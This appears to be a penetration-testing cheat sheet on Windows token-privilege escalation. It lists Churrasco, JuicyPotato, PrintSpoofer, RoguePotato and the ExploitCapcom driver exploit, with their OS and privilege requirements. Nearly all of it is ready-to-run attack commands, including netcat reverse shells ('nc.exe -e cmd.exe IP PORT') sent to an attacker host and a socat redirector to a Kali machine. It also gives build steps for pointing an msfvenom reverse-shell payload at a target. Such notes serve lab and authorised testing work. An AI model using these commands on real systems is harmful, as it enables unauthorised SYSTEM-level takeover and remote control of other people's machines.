windows token exploits
Churrasco
REQUIREMENTS:
SeImpersonalPrivilege
Windows XP/VISTA/2003/2008, Win Server 2003
# usage
> churrasco.exe -d "nc.exe -e cmd.exe IP PORT"
HotPotato
Windows 7,8,10, Server 2008, Server 2012
REQUIREMENTS:
SeImpersonatePrivilege
machine is < Windows 10 1809 < Windows Server 2019
Try:
{03ca98d6-ff5d-49b8-abc6-03dd84127020}
> JuicyPotato.exe -l 1337 -p "c:\windows\system32\cmd.exe" -a "/c PATH\nc.exe -e cmd.exe IP PORT" -t * -c CLSID
> Juicy.Potato.x86.exe -l 1337 -p "c:\users\public\kashz.exe" -t * -c CLSID
> PSExec64.exe -i -u "nt authority\local service" <shell.exe>
REQUIREMENTS:
SeImpersonatePrivilege
Win10, Server 2016, Server 2019
> PrintSpoofer.exe -i -c cmd.exe
> PrintSpoofer.exe -c "nc.exe IP PORT -e cmd.exe"
# -i : interactive
# -c : command to run
REQUIREMENTS:
SeImpersonatePrivilege
machine is >= Windows 10 1809 & Windows Server 2019
# socat redirector for OXID resolving, must use 135
$ socat tcp-listen:135,reuseaddr,fork tcp:KALI_IP:9999
> RoguePotato.exe -r KALI_IP -e "PATH\nc.exe IP PORT -e cmd.exe" -l 9999
REQUIREMENTS:
Visual Studio to compile
Steps:
obtain user SID
Get-ADUser -Identity 'svc-print' | select SID
(New-Object System.Security.Principal.NTAccount("svc-print")).Translate([System.Security.Principal.SecurityIdentifier]).value
Clone Repo: tandasat/ExploitCapcom/
Generate
.exe
msfvenom reverse shellUpdate path to reverse shell on target line 410 in file
ExploitCapcom.cpp
Set for RELEASE
Build Solution
run
.\ExploitCapcom.exe
SeBackupPrivilege
Last updated
Was this helpful?